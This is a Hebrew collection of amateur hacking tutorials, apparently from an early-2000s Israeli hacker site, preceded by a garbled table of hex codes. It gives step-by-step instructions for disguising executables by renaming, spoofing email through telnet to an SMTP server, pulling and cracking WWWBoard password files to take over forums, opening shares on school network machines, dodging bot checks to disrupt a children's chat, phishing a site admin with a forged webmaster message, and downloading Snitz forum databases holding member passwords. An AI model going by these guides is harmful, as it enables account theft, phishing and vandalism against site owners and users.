a7 =70 =9b =6e =94 =e9 =57= 08= =
6e =c1 =16 =fd =08 =f2 =8f =31= ]
c7 =10 =fb =0e =f4 =89 =37= 68= [
4e =e1 =36 =dd =28 =d2 =af =11= }
e7 =30 =db =2e =d4 =a9 =17= 48= {
0e =a1 =76 =9d =68 =92 =ef =51= ;
0f =a0 =77 =9c =69 =93 =ee =50= :
bd =6a =81 =74 =8e =f3 =4d= 12= '
b8 =6f =84 =71 =8b =f6 =48= 17= "
b6 =61 =8a =7f =85 =f8 =46= 19= ,
a6 =71 =9a =6f =95 =e8 =56= 09= >
1b =b4 =63 =88 =7d =87 =fa =44= .
0b =a4 =73 =98 =6d =97 =ea =54= <
‫‪0a‬‬ ‫‪=a5‬‬ ‫‪=72‬‬ ‫‪=99‬‬ ‫‪=6c‬‬ ‫‪=96‬‬ ‫=‪=eb =55‬‬ ‫?‬
‫‪1a‬‬ ‫‪=b5‬‬ ‫‪=62‬‬ ‫‪=89‬‬ ‫‪=7c‬‬ ‫‪=86‬‬ ‫=‪=fb =45‬‬ ‫‪/‬‬
‫‪c6‬‬ ‫‪=11‬‬ ‫‪=fa‬‬ ‫‪=0f‬‬ ‫‪=f5‬‬ ‫‪=88‬‬ ‫=‪=36= 69‬‬ ‫\‬
‫‪e6‬‬ ‫‪=31‬‬ ‫‪=da‬‬ ‫‪=2f‬‬ ‫‪=d5‬‬ ‫‪=a8‬‬ ‫=‪=16= 49‬‬ ‫|‬
‫באגים בוינדואז‬
‫בטקסט הזה אני אסביר למה מיקרוסופט הם טמלים‪ .‬במיוחד בווינדואז‪.‬‬
‫אני לא העשה את המדריכים ארוכים אז אם חסרים פרטי מידע חשובים תודיעו לי‬
‫ב‪...‬‬
‫‪mailto:hack_planet_site@hotmail.co.il‬‬
‫ועכשיו לבג הראשון‪:‬שינוי סיומת‬
‫משום מה הבאג הזה עובד רק על קבצי התקנה‪ ...‬טוב אז יש לכם קובץ התקנה‬
‫שאתם רוצים לשנות מ‬
‫‪exe‬‬
‫ל‬
‫‪pif‬‬
‫נגיד שהקובץ נקרא‬

‫‪c:\viruses\setup.exe‬‬
‫לכו להתחל‬
‫הפעל‬
‫ותכתבו שם‬
‫‪command‬‬
‫יפתח לכם חלון דוס שם תכתבו‬
‫‪dir c:\viruses‬‬
‫‪ren setup.exe setup.exe.doc‬‬
‫‪ren setup.exe.doc setup.exe.doc.pif‬‬
‫הערה‪:‬זה לא עובד בכל הגרסאות של ווינדואז‬
‫אם הכל עבר בשלום יש לכם עכשיו קובץ‬
‫‪pif‬‬
‫שאם תכנסו אליו תפתח לכם התוכנה עצמה ואם זה לא עבד אז ווינדואז אומר‬
‫לכם את ההודעה הבאה‬
‫‪....'cannot find the file 'c:\bla\blaabksdbhjgask‬‬
‫שזה גם טוב כי ככה יש לכם את הקובץ אבל רק דרך שינוי שם בדוס‬
‫יהיה אפשר להכנס אליו זאת אומרת שתוכלו להסתיר את הקוצץ ושום בן אדם עם‬
‫ידע ממוצע במחשבים לא יוכל להגנס אליו ואם תעשו את הקובץ חבוי‬
‫אז בכלל יהיה קשה למצוא אותו מקווה שזה תרם לכם‬
‫בג שני‪:‬חסימת אפשרות כניסה לתקיות וקצבים מהשולחן עבודה‬
‫אני חייב להגיד מראש שזה לא בג זה סתם קטע חביב‬

‫אוקיי‪ ...‬תצרו תיקיה חדשה בשולחן העבודה ותעשו‬
‫‪(screenShot(print screen‬‬
‫זה נמצא מעל כפתור ה‬
‫‪insert‬‬
‫טוב תכנסו לצייר‬
‫לכו לעריכה ותבחרו הדבק אם יעלה לכם חלון הודעה בחרו בכן‬
‫אם עשיתם הכל נכון עד עכשיו אתם תראו את השולחן עבודה בצייר‪.‬תמזערו את‬
‫הצייר ועכשיו לכו לשולחן עבודה‬
‫ותעבירו את כל הקיצורי דרך לתיקיה החדשה שיצרנו קודם עכשיו תחזרו לצייר‬
‫תשמרו את התמונה לכו לתפריט קובץ‬
‫וביחרו קבע כטפט עכשיו הקבצים שהעברנו לתיקיה החדשה אמורים להופיע שוב‬
‫בשולחן עבודה רק שהפעם אי אפשר ללחות עליהם‬
‫בן אדם עם מוח ממוצע יבין למה אי אפשר להכנס בהצלחה‬
‫בג שלישי‪:‬סתם חביב‬

‫לי אין רעיון לשימוש טוב של הבג הבא אבל בהצלחה‪ .‬תיצרו תיקיה חדשה‬
‫ותקראו לה איך שבא לכם עכשיו בתוך התיקיה צרו קובץ טקסט עם‬
‫אותו שם‪ .‬עכשיו לכו לכתובת‬
‫)‪(address bar‬‬
‫ותכתבו‬
‫‪\:c‬שם התיקיה‬
‫והפלא ופלא נפתח קובץ הטקסט בהצלחה‬
‫הערה‪ :‬אם אתם רוצים לשנות את המראה של התיקיות שלכם אז תל בו ל‬

‫‪c:\windows\web‬‬
‫ותגררו את הקבצים אחד אחד לדפדפן ותראו מה קורה‬
‫בגים בוינדואז חלק ב'‬

‫בגים בווינדואז‬
‫יאללה בואו נעשה את זה קצר‬
‫נכון כשעולה המחשב‬
‫יש תמונת פתיח של ווינדואז????!!!! וגם תמונה כשמכבים את המחשב אז כאן‬
‫כתוב איך לשנות את התמונות‬
‫לכו לווידאוז וחפשו את‬

‫‪logow.sys & logos.sys‬‬
‫שני הקבצים הללו הם קבצי "מערכת" מוסווים‬
‫קודם כל כדי ליצור גיבוי לקבצים כי אם משהו נדפק אז זה לא טוב‬
‫יאללה יש לנו גיבויים ויש הכל אז אפשר להתחיל‬
‫שנו את ה‬
‫‪sys‬‬
‫בסוף שם הקובץ ל‬
‫‪gif‬‬
‫ואז תגלו שזו בכלל התמונה עצמה עכשיו פתחו אותה בעורך תמונות ערכו אותה‬
‫כפי רצונכם שמרו ואז החזירו את הקבצי גיפ הערוכים לווינדואז‬
‫עכשיו פתחו חלון דוס וכתבו‬
‫‪dir c:\windows‬‬
‫חכו‬
‫כתבו‬
‫‪ren logow.gif logow.sys‬‬
‫‪ren logos.gif logos.sys‬‬
‫‪exit‬‬
‫והנה יש לכם את התמונות שרציתם ביי‬
‫מקווה שתרמתי‬
‫כיבוי‬
‫_________‬
‫)במקום התחל < כיבוי < בחירת כיבוי < אישור(‪:‬‬

‫לחיצה ימנית בשולחן עבודה‪ ,‬חדש < קיצור דרך‪.‬‬
‫במקום המתאים כתוב את הפקודה הבאה‬
‫‪C:\WINDOWS\RUNDLL.EXE user.exe,exitwindows‬‬
‫לחצו הבא <‪.‬‬
‫‪ :Name‬כיבוי‬
‫סיום‪.‬‬
‫הפעלה מחדש‬
‫________________‬
‫)במקום התחל < כיבוי < בחירת הפעל מחדש < אישור < (‬
‫לחיצה ימנית בשולחן עבודה‪ ,‬חדש < קיצור דרך‪.‬‬

‫במקום המתאים כתוב את הפקודה הבאה‬
‫‪C:\WINDOWS\command.com /c exit‬‬
‫לחצו הבא <‪.‬‬
‫‪ :Name‬הפעלה מחדש‪.‬‬
‫סיום‪.‬‬
‫לחיצה ימנית על האייקון < מאפיינים < תוכנית‬
‫לבדוק שמסומן "‪."Close on exit‬‬
‫דואר מזוייף עם טלנט‬
‫מדריך זה נכתב ע"י‬

‫איך לשלוח דואר על שם מישהו אחר‬
‫אוקיי אם אתם רוצים לשדך בין חבר שלכם לחברה שלכם למשל אז לכו להתחל‪---‬‬
‫הפעל ושם תכתבו‬
‫"‪"telnet mail.yourisp 25‬‬
‫)‪(your isp means your internet service provider‬‬
‫אצלי האיי אס פי זה אינטרנט זהב אז אני כותב‬
‫"‪"telnet mail.zahav.net.il‬‬
‫וכל אחד מתאים את זה לספק אינטרנט שלו‬
‫אם הכול עבר טוב אמור להפתח לכם חלון‬
‫)‪(its the telnet‬‬
‫לכו ל‬
‫‪terminal‬‬
‫‪preferences‬‬
‫ותסמנו את‬
‫‪local echo‬‬
‫‪blinking cursor‬‬
‫‪block cursor‬‬
‫‪buffer size=25‬‬
‫‪emulation=vt-100\ANSI‬‬
‫תלחצו אוקיי‬
‫)שימו לב! אם תכתבו מילה לא נכון לא תוכלו למחוק אותה טלנט‬

‫לא תומך בזה אפילו אם נראה לכם שזה נמחק תבינו שזה לא יכול להמחק(‬
‫עכשיו כתבו‬
‫‪)mail from: anyemail‬חייב להיות קיים אז במקרה של השידוך השתמשו באי‬

‫מייל של חבר שלכם(‬
‫לחצו‬
‫‪enter‬‬
‫‪)rcpt to: anymail‬במקרה הזה נשתמש באי מייל של החברה שלכם(‬
‫לחצו‬
‫‪enter‬‬
‫‪data‬‬
‫לחצו‬
‫‪enter‬‬
‫כתבו את תוכן ההודעה‬

‫בלה בלה בלה בלה‬
‫אתם חייבים לסיים את המכתב בסימן נקודה‬

‫"‪)".‬בלי המרכאות(‬
‫ואסור להשתמש במכתב בנקודות‬
‫כשסיימתם ולחצתם על‬

‫‪.‬‬
‫אמורה להיות הודעה קטנה ואז לחצו‬
‫‪quit‬‬
‫והנה‬
‫החברה שלך מקבלת מכתב מחבר שלך ואם תעשה בדיוק ההפך חבר שלך גם יקבל‬
‫מכתב מחברה שלך והם יתחתנו ויעשו ילדים ותוכל למקור את הילדים בשוק‬
‫הפשפשים‬
‫מקווה שזה תרם לכם‬
‫קבלת סיסמה של מנהל פורום‬

‫אוקיי אחים שימו לב זו שיטה לפרוץ לפרומים של אתר שנקרא‬
‫‪matts wwwboard‬‬
‫האתר הזה מחלק פורומים בחינם כמו הרבה אתרים אחרים אבל בפורום שלו יש‬
‫בעיה ביטחונית רצינית‬
‫שימו אם כתובת האתר היא משהו כזה זאת אומרת שתצליחו‬
‫‪http://someurl.com/wwwboard/wwwboard.htm‬‬
‫עכשיו אם זאת הכתובת אז תכתבו במקום ה‬
‫‪wwwboard.htm‬‬
‫את זה‪:‬‬
‫‪passwd.txt‬‬
‫זאת אומרת שתשנו את הכתובת ל‬
‫‪http://someurl.com/wwwboard/passwd.txt‬‬
‫אם הכול עבר בשלום יפתח לכם עמוד שנראה ככה‬
‫‪username:71basdy12b78a‬‬
‫במקום של ה‬
‫‪username‬‬
‫נמצא השם משתמש של אותו מנהל פורום ובחלק שבא אחרי הנקודותיים זו הסיסמה‬
‫אבל‪ ...‬הסיסמה מוצפת זה לא קל כמו שחשבתם הא‪ ...‬טוב אתם צריכים להוריד‬
‫אחת משתי התוכנות הבאות‬
‫‪cracker jack‬‬
‫‪john the ripper‬‬
‫התוכנות האלה הן תוכנות ברוטל פורס לפריצת סיסמאות‬

‫‪unix‬‬
‫אוקיי אתם חייבים להכנס לתוכנות מדוס מוינדואז זה לא ילך‬
‫אחרי שנכנסתם לתוכנה עליכם לומר לתוכנה את שם הקובץ )שהורדתם( למחשב ובו‬
‫הסיסמה וכו' ואת קובץ הסיסמאות שמותקן יחד עם התוכנה‬
‫ולבסוף את קובץ ה‬
‫‪output‬‬
‫יאנו איפה אתם רוצים לשמור את הקובץ תריצו עליו את התוכנה ובאנג יש לכם‬
‫את הסיסמה בקובץ‬
‫‪output‬‬
‫עכשיו לכו לכתובת הזאת‬
‫‪http://someurl.com/wwwadmin.pl‬‬
‫עכשיו יש לכם אפשרויות מה לעשות פשוט הכניסו סיסמה והחלו להתעלל בפורום בהצלחה‬
‫פריצה למחשבי רשת‬

‫פריצה ל‬
‫‪windows 9x‬‬
‫)אם מישהו לא מבין מה זה‬
‫‪9x‬‬
‫שיעזוב מיד את הטקסט(‬
‫טוב זה מאוד פשוט‬

‫קודם כל עליכם להיות מחוברים ברשת כך שטוב לעשות זאת מבי"ס מכוון שברוב‬
‫בתי הספר יש רשת עכשיו‬
‫לכו ל‬
‫‪ms-dos‬‬
‫ותכתבו‬
‫‪nbtstat -10.128.28.16‬‬
‫ואז יכתב לכם משהו כזה‬
‫‪Netbios Name‬‬
‫^‬
‫‪<SHARE a <00‬‬
‫‪ ===> <SHARE ab <20‬זה מה שמעניין אותנו‬
‫‪<FILE‬‬ ‫‪<1b‬‬
‫עכשיו לכו התחל ===< הפעלה וכתבו‬

‫\\‪ip.goes.here nbtstat -10.128.28.16‬‬
‫תמתינו מספר שניות‬

‫אם למחשב של הנפרץ אין‬
‫‪firewall‬‬
‫יפתח לכם חלון תיקיה וזהו בעצם המחשב של הנפרץ‬
‫יש לי עוד שיטה הרבה יותר איכותית אבל ידיד שלי אינו מרשה לי לפרסם אותה‬
‫מסיבות אישיות‬
‫אז אני אבקש ממנו רשות פעם נוספת ואם הוא יסכים אז אני אפרסם‬
‫שלכם‬
‫פריצה לצ'אט של ערוץ הילדים‬

‫‪:‬הקדמה‬
‫!דרך המירק ‪ http://chat.shesh.co.il‬במדריך זה תדעו איך להתחבר לצ'אט של‬
‫ערוץ הילדים‬
‫‪...‬למה אתם שואלים ? סתם ככה בגלל שאנחנו משועממים ובא לנו להרוס משהו‬
‫!אז כאן יש לכם הזדמנות להתחבר לצ'אט דרך המירק ולא דרך ממשק הג'אווה‬
‫לזרוע הרס‬
‫או סתם לצ'וטט עם איזה ליימרונים כאלה‪...‬יש לכן למה לצפות בעוד כמה ימים‬
‫יעלה טקסט של איך‬
‫‪.‬להכנס לצ'אט של נענע דרך מירק‬
‫‪ Alt+O‬דבר ראשון אתם נכנסים להגדרות‬

‫‪ Connect‬אתם משנים את בהגדרות ה את ה‬
‫‪ ^) Nickname : ^nick‬אתם בוחרים את הניק העיקר שבהתחלה יהיה (‬
‫^לניק שלכם עם ה ‪Full Name‬ואת ה‬
‫עכשיו אתם צריכים ללכת ל‬
‫‪User ID‬ושם לשנות את ה ‪Identd‬‬
‫^לניק שלכם בלי ה‬
‫עכשיו אתם מוכנים להכנס לצ'אט של ערוץ הילדים דרך מירק! בלי שיתנו לכם‬
‫קיל או‬
‫)חובה כי אם לא אתם לא מצליחים להכנס(‬ ‫‪ignore MiniME/‬‬

‫‪Server Chat.Shesh.Co.il 8799 nomomircers/‬‬
‫‪:‬החדרים‬
‫‪ - eayj\aufiy`^#‬חדר הארי פוטר‬

‫‪ - hdy\ayazj`^#‬חדר ראשי‬
‫‪ - bme\abme`^#‬חדר בלה בלה‬
‫‪ - hdy\aufxjofp`^#‬חדר פוקימון‬
‫‪ - imffjgje`^#‬חדר טלוויזיה‬
‫‪:‬חוקים‬
‫‪... .1‬אסור לכם לדבר בכללי ! רק בפרטי‬

‫^‪ D[a]rk‬כשאתם כותבים בפרטי‬ ‫‪ " :D[a]rk" .2‬אז לפני כל משפט אתם כותבים‬
‫נגיד הניק שלכם זה‬
‫‪ Version/‬שלא יהיה לכם שום קשר‬ ‫‪ .3‬הוא דופק לכם זי ליין ‪ Ping/‬או‬
‫עם הבוט מיני‪-‬מי ! בגלל שכל דבר שהוא מקבל כל דבר אפילו‬
‫‪ .4‬אסור לכם להיות ביותר מערוץ אחד ! כי אם אתם ביותר מערוץ אחד ישר‬
‫אתם מקבלים זי ליין‬
‫‪:‬שיטות לניקים בעברית‬
‫‪! .1‬אתם נכנסים לצ'אט דרך המירק לחדר הראשי‬

‫‪ .2‬עכשיו אתם הולכים לאתר וכותבים את הניק שאתם רוצים בעברית! ונכנסים‬
‫לצ'אט‪....‬‬
‫‪ .3‬עכשיו אתם מהר מעבירים לחלון של המירק ומסתכלים איך נראה הניק שלכם‬
‫בעברית כשהו מוצפן ומעתיקים אותו ומשנים את כל ההגדרות שעשינו בהתחלה‬
‫‪=a .4‬א ‪=b‬ב ‪=c‬ג ‪=d‬ד ‪=e‬ה ‪=f‬ו ‪=g‬ז ‪=h‬ח ‪=i‬ט ‪=j‬י ‪=l‬כ ‪=m‬ל ‪=o‬מ ‪=q‬נ ‪=r‬ס ‪=s‬ע‬
‫‪=u‬פ ‪=w‬צ ‪=x‬ק ‪=y‬ר ‪=z‬ש‬
‫} =ת‬
‫"‪"a/‬‬ ‫‪ .5‬כדי לעשות רווח בניק כותבים‬
‫‪:‬קצת הסברים על כל דבר שעשינו‬
‫‪ - ignore MiniME/ .1‬ואז הוא רואה את הגירסה ואיזה סקריפט יש ‪VERSION/‬‬

‫ברגע שהסרבר מקבל את הסיסמא שלכם הבוט הזה עושה עליכם‬
‫לכם ואסור לו לדעת את זה בגלל שהאופרים‬
‫של הסרבר של ערוץ הילדים מקבלים סקריפט מיוחד‪....‬ובגלל זה אנחנו מתעלמים‬
‫מהפקודה שהבוט עושה וככה הוא לא יכול‬
‫לבדוק את הגירסה‪/‬שם של הסקריפט שלנו‪.‬‬
‫‪! .2‬אם אתם רוצים להשאר מחוברים לצ'אט אתם חייבים לצייט לחוקים שציינתי!‬
‫כי אם לא זי ליין על המקום‬
‫‪:‬נ‪.‬ב‬
‫עוד לא מצאתי שייטה איך לדבר בכללי בלי לקבל זי ליין אז מי שמצא דרך אנא‬
‫לפנות אליי באיי סי קיו‪105260623 :‬‬
‫^^‪ ^^SuB_ZerO‬כתבה זאת נכתבה על ידי‬
‫‪ - www.hackerz-zone.co.il‬כל הזכויות שמורות ל‬
‫בקרוב* איך להכנס לצ'אט של נענע*‬
‫‪Hack server account‬‬
‫אני לא אחראי בשום אופן למעשים\נזק\בעיה\כל דבר שנגרמים בגלל‬

‫קריאת טקסט‬
‫זה לא ישירות ולא בעקיפין ‪ .‬כל החומר כאן היא למטרה לימודית בלבד‬
‫ואסור בשום פנים ואופן להשתמש בו‬
‫‪.‬‬
‫היי!!!!!!!!!!!!!!‬
‫מה המצב!?‬
‫הכל בסדר!‬
‫יופי‪..............‬‬
‫זו הכתבה הראשונה שלי‪ ...‬אני לא יודע עם אמשיך אתן אבל בכל זאת צרו איתי‬
‫קשר והביעו את‬
‫ביקורתיכם‪..............‬‬
‫טוב! בכל מקרה מה שרציתי לדבר איתכם זה שלהרבה ממכם יש הרבה ידע‪...‬‬
‫טוב‪ ...‬אז אלה עם הידע‬
‫מיסתדרים יופי בחיים‪ ...‬אבל מה עם אלה בלי הידע!?‬
‫טוב‪ ,‬אז מה שקורה זה שצריך להישתמש בתחכום‪ ...‬מה אני מגדיר תחכום!?‬
‫תחכום זה מישהו שצריך להפיק מהידע שיש לו כמה שיותר‪ .‬בין עם זה קצת ידע‬
‫או הרבה‪...‬‬
‫טוב נו!? אז מה אני מזבל ת'שכל בואו נמשיך עם הכתבה!!!‬
‫טוב היום נדבר על‬

‫פריצה לחשבון השרת של האתר‬
‫~~~~~~~~~~~~~~~~~~~~~~~~~~‬
‫לא אני לא מדבר על אקספלוייטים ושאללים‪] ...‬בעברית המאובתת של ימינו‪[..‬‬
‫כי זה ידע לא תחכום‪...‬‬
‫‪---------------------------------------------------------------------‬‬
‫‪-----------------------------‬‬
‫מצרכים‪:‬‬
‫* ידע בסיסי במחשב ]הפעלת האינטרנט‪ ,‬לדעת ליכתוב במקלדת‪ ,‬בלה בלה‬
‫בלה‪[.......‬‬
‫* ידע בזיוף ‪] Email‬מאוד מומלץ‪ ...‬עם אתם לא יודעים אז תקראו את המדריך‬

‫משל קול אבדול על זה‪......‬לא‬
‫יודע מי זה‪[....‬‬
‫* מח ]רצוי עובד![‬
‫אז מזה בכלל חשבון שרת!?‬
‫^^^^^^^^^^^^^^^^^^^^^^^^‬
‫מכירים את ‪ ? http://www.geocities.com‬טוב עם לא הם נותנים איחסון לאתר‬

‫שלך!‬
‫מה זה איחסון!?‬
‫כאשר אני אומר איכסון אני מתכוון שהם מאכסנים את קבצי אתרים של אחרים;‬
‫]אתרים מורכבים מקבצים[‬
‫דוגמא‪ :‬בואו נלך לאתר ‪.http://www.warez-forum.up.co.il‬‬
‫~~~~~‬
‫תלחצו קליק ימני על העכבר ותלחצו מאפיינים או באנגלית ‪Properties‬‬
‫עכשיו אתם רואים את כתובת האתר האמיתית!‬
‫זתומרת הכתובת ‪http://www.warez-forum.up.co.il‬‬

‫היא רק קיצור לכתובת האמיתית!‬
‫שאלה‪ :‬מה זה קשור לחשבון שרת בכלל!?‬
‫תשובה‪ :‬הכתובת האמיתית היא ‪http://freehost25.websamba.com/YWForum‬‬
‫שאלה‪ :‬איך יודעים את שם השרת!?‬
‫תשובה‪ :‬בואו נראה מה יש לנו בשמות‬
‫‪freehost25‬‬
‫‪websamba‬‬
‫ו ‪YWForum‬‬
‫טוב בואו נראה השם ‪ Freehost25‬נשמע קצת מוזר לשם של שרת‬
‫השם ‪ YWForum‬נשמע יותר כמו השם של האתר‪...‬מה שנשאר לנו זה ‪Websamba‬‬
‫שזו כנראה שם השרת‪ ...‬בכל שרת זה שונה‪ ...‬אבל הבנתם את העקרון‪...‬‬
‫לדעת עוד על שרתי אירוח תוכלו לשים את המלה"‪"Webhosting‬‬
‫בגוגל ]תמיד תשימו גרשיים כדי לקבל את מספר התוצאות המצומצם ביותר[‬
‫או בכל מנוע חיפוש אחר‪ ...‬אני מקווה שהבנתם את העקרון‪...‬‬
‫‪---------------------------------------------------------------------‬‬
‫‪-------------------------------‬‬
‫‪------‬‬
‫טוב אז הרעייון שלנו זה להשיג את השם משתמש והסיסמא של חשבון השרת של‬
‫האתר‪.‬‬
‫לפי הדוגמא שנתתי קודם ה ‪ User‬שלנו הוא כנראה ‪YWForum‬‬
‫אבל מה עם הסיסמא!?‬
‫אז בואו נשתמש בשיטה מתוחכמת‪ ....‬שוב אינני הולך ללמד אתכם משהו חדש‪,‬‬
‫אלה רק‬
‫אעזור לכם לנצל "קצת" יותר את המוח שיש לכם ]לרובכם[‪.‬‬
‫‪---------------------------------------------------------------------‬‬
‫‪-------------------------------‬‬
‫‪--‬‬
‫מכירים את האפשרות הזאת בכל מני אתרים שמבקשים שם משתמש וסיסמא ‪Forgot‬‬
‫‪?Password‬‬
‫או בעברית "שחזר סיסמא"? "אתם בטח שואלים מה לעזאזל זה עוזר לנו!!??"‬
‫בדרך כלל באתרים כאלה שאתה לוחץ על האפשרות וזה‬
‫שולח לך את הסיסמא לאימייל ששמת בפרופיל האישי‪ ...‬אתם בטח לא מבינים מה‬
‫זה קשור בכלל‪..‬‬
‫אז בואו נלך לאתר במקרה לשרת שדיברנו עליו קודם‪[www.websamba.com] ..‬‬
‫טוב אז ככ‪ ,‬באתר יש לנו את האפשרות "‪" FORGOTTEN PASSWORDS‬‬
‫וזה מבקש את אימייל המשתמש‪...‬‬
‫שאלה‪ :‬איך אנחנו אמורים להשיג את אימייל המשתמש כדי שנשלח את הסיסמא‬
‫לדואר שלו!?‬
‫בדרך כלל באתרים כתוב דברים כמו "צור קשר" למשל באתר ‪http://www.red-‬‬
‫‪board.co.il‬‬
‫כתוב שם "צור קשר" לוחצים וזה מביא אותנו לעמוד שכתוב בו ‪-Admin‬‬
‫אימייל‪.........‬‬
‫אבל זה סתם דוגמא‪ ...‬ככה זה בדרך כלל באתרים וכמובן שאפשר גם להשיג את‬
‫אימייל המשתמש‬
‫בצורות אחרות‪ ,‬כמו עם אתה מכיר אותו אז אתה יכול לשאול אותו מה‬
‫האימייל‪...‬‬
‫יכול להיות שהוא פרסם איפה שהוא‪ ...‬יכול להיות שרשום בפרופיל באיי סי‬
‫קיו‪ ....‬והלאה‪...‬‬
‫לדוא"ל שלו‪ ,‬אבל מה זה‬ ‫טוב‪ ,‬גילנו את אימייל האדמין שלחנו את הסיסמא‬
‫עוזר לנו!?!?‬
‫חשבתם שעם אנחנו פורצים לאדמין לאימייל אז נוכל לקבל את הסיסמא!?‬
‫פריצת האימייל‬
‫~~~~~~~~~~~~~‬
‫באחד הגליונות הקודמים של גהנום היה מדריך לפריצת אימייל‪.‬‬
‫אבל כמו שאמרתי אתם תפרצו ללא ידע גדול‪..‬‬
‫אז אתם לא צריכים לקרוא את הכתבה‪ ...‬רק עם במקרה אז אולי יעזור לכם‪...‬‬
‫טוב‪ ,‬עם אתם יודעים פרטים על המשתמש אתם יכולים לשחזר את סיסמת האימייל‬
‫שלו‬
‫לפי תאריך הלידה של המשתמש ולאחר מכן שואלים איתכם שאלה סודית שהמשתמש‬
‫קבע‬
‫ואתם צריכים לתת תשובה מדוייקת‪.‬‬
‫אבל תחשבו על זה עם היה אפשרי שהקורבן היה בעצמו‬
‫שולח את סיסמת האימייל שלו ישירות אל תא הדואר שלכם‪.‬‬
‫זה הסיבה שרצוי ידע בזיוף אימייל‪ ...‬מה שאנחנו הולכים לעשות‬
‫זה לזייף אימייל מה ‪ Webmaster‬של חברת האמייל של הקורבן‪.‬‬
‫טוב‪ ,‬נגיד שהשגנו את אימייל המשתמש וזה משהו כזה‬
‫‪] warez_forum@walla.co.il‬סתם דוגמא[‪...‬‬
‫שיטה א‬
‫^^^^^^‬
‫אז תלכו לוואלה ותרשמו עם איזה שם רשמי כמו‬
‫‪ Walladministor‬או ‪ helpdesk‬שיצא משהו כמו ‪helpdesk@walla.co.il‬‬
‫‪*/‬כל הזמן תנסו שמות נוספים כי רוב הסכויים שהשמות הרשמיים תפוסים‪\*...‬‬
‫עכשיו אנחנו מזייפים אימייל ]בשביל זה צריך לדעת לזייף אימייל[‬
‫שהשולח יהיה ‪.... webmaster@walla.co.il‬‬
‫עם עוד לא הבנתם את הרעיון‪ ,‬אז אנחנו רצים שהקורבן יקבל משהו כזה‪:‬‬
‫‪Hello blabla‬‬
‫‪Please send your password to this address‬‬
‫]הכתובת[‬
‫‪.......Because.............BLAbla‬‬
‫‪.....Thank YOu ............blabla‬‬
‫משהו כזה וכמובן שיראה רשמי‪ ...‬אני מקווה שהבנתם את העיקרון‪.‬‬

‫בשיטה הזאת זיוף אימייל פחות נחוץ אבל אנחנו רוצים שהקורבן‬ ‫‪*/‬הערה‪:‬‬
‫יחשוב‬
‫שההודעה מה "‪ "Webmaster‬ושלא יחשוב שזה סתם בן אדם שרוצה סיסמת‬

‫אימייל‪\*...‬‬
‫אבל מה קורה עם כל השמות הטובים הרשמיים תפוסים!?‬
‫אז יש לנו‬
‫שיטה חילופית‬
‫^^^^^^^^^^^^‬
‫השיטה הזאת לא תמיד אמינה אבל שווה לנסות‪...‬‬
‫תפתחו חשבון עם שם מסובך ושיראה סודי כמו ‪3ebh8nt4u‬‬
‫עכשיו הקורבן באמת יחשוב ויחשוד שמשהו פה לא בסדר‪...‬‬
‫אז במכתב הזה יהיה כתובת "שזה כתובת סודית שעם הוא שולח את הסיסמא‬
‫לכתובת הזו אז הוא יקבל שידרוג בדואר" ]סתם משהו שעלה במוחי‪[...‬‬
‫עוד משהו שעלה במוחי‪[...‬‬ ‫"והסיבה שהוא נבחר זה בגלל שהיה הגרלה" ]סתם‬
‫‪---------------------------------------------------------------------‬‬
‫‪-------------------------‬‬
‫טוב כפי שאתם יודעים זה לא יעבוד על כל אחד‪.‬‬
‫אבל האדמינים הטפשים האלה שלא יודעים כלום מהחיים שלהם‬
‫לא ירוויחו הרבה‪ .‬טוב‪ ,‬אז השגנו את הסיסמא מה עושים עכשיו!?‬
‫אז כמו שב ‪ Geocities‬יש כניסה תיכנסו ותעשו מה שאתם רוצים‬
‫לאתר המסכן!‬
‫שלכם‪,‬‬
‫‪B{u}G‬‬
‫פריצה לסניטז‬
‫שיטה לקבל סיסמאות של ‪.Forum Snitz‬‬
‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬
‫טוב דבר ראשון‪ ,‬זה לא עובד בכל הפורומים רק‬
‫לאדמינים הדפוקים שלא שינו את כתובת המסד נתונים‪.‬‬
‫מה זה מסד נתונים?‬
‫~~~~~~~~~~~~~~~~~‬
‫מסד נתונים זה קובץ שבה מאוכסנים כל סיסמאות האתר‪ ...‬ומאפיינה‪...‬‬
‫למשל‪ Microsoft Access ,‬זה מסד נתונים של מייקרוסופט‪.‬‬
‫‪ MS Access‬זה תוכנה שפותחת \ יוצרת מסדי נתונים[‬
‫איך נראה פורום של סניץ!?‬
‫~~~~~~~~~~~~~~~~~~~~~~~~‬
‫הינא כמה דוגמאות‪...‬‬
‫‪www.red-board.co.il (1‬‬
‫‪www.warez-forum.up.co.il (2‬‬
‫‪www.israel-forum.co.il (3‬‬
‫טוב‪ ,‬אתם בטח ראיתם פורום של סניץ‪,‬‬
‫אז בפעם הראשונה שרואים אחד כבר יודעים שזה‬
‫פורום של סניץ‪.‬‬
‫טוב‪ ,‬אז ברירת המחדל של שם המסד נתונים הוא‪:‬‬
‫‪.Snitz_forums_2000‬‬
‫זתומרת שעם האתר שלנו יהיה ‪www.hacked.com‬‬
‫אז הכתובת תהיה ‪www.hacked.com/snitz_forums_2000.mdb‬‬
‫‪ ,www.hacked.com/db/snitz_forums_2000.mdb‬או‬
‫‪ www.hacked.com/forum/db/snitz_forums_2000.mdb‬או‬
‫‪www.hacked.com/forum/snitz_forums_2000.mdb‬‬
‫אתם יכולים לשחק עם זה‪ ...‬תנסו[‬
‫למה שאנשים לא ישנו את הכתובת!?‬
‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬
‫בגלל שפורום של סניץ מאוד להתקנה ואין כל צורך‬
‫בידע בשפת ‪.ASP‬‬
‫למי שלא יודע מה זה ‪ ASP‬זה שפת תכנות באינטרנט‪ ,‬וסניץ‬
‫הוא פורום שנוצר משפת ‪.ASP‬‬
‫ובגלל זה אנשים לא יודעים ‪ ASP‬וחושבים שכתובת המסד נתונים חייב להיות‬
‫כך‪ .‬ואפילו אם הם רוצים לשנות הם לא יודעים איך!‬
‫טוב‪ ,‬נגיד מצאתם איזה אדמין דפוק‪ ,‬והוא לא שינה את הכתובת‪,‬‬
‫ואתם הורדתם את המסד נתונים ופתחתם אותו‪,‬‬
‫תחפשו משהו שקוראים לא ‪Members‬‬
‫ותחת הכותרת הזאת תהיה את כל הפרטים על משתמש הפורום כולל הסיסמא!‬

‫]‪ ,forum_members‬ואתם חייבם ‪ MS Access‬אני חושב ‪ 97‬ומעלה כדי לפתוח את‬
‫זה[‬
‫‪B{u}G‬‬
‫נושא‪ :‬אבטחה‬
‫כן יוצגו המדריכים והטקסטים בנושא אבטחה‪:‬‬
‫איך להיות מאובטח‪ ,‬למה להיות מאובטח ועוד‬
‫אנונימיות במירק‬
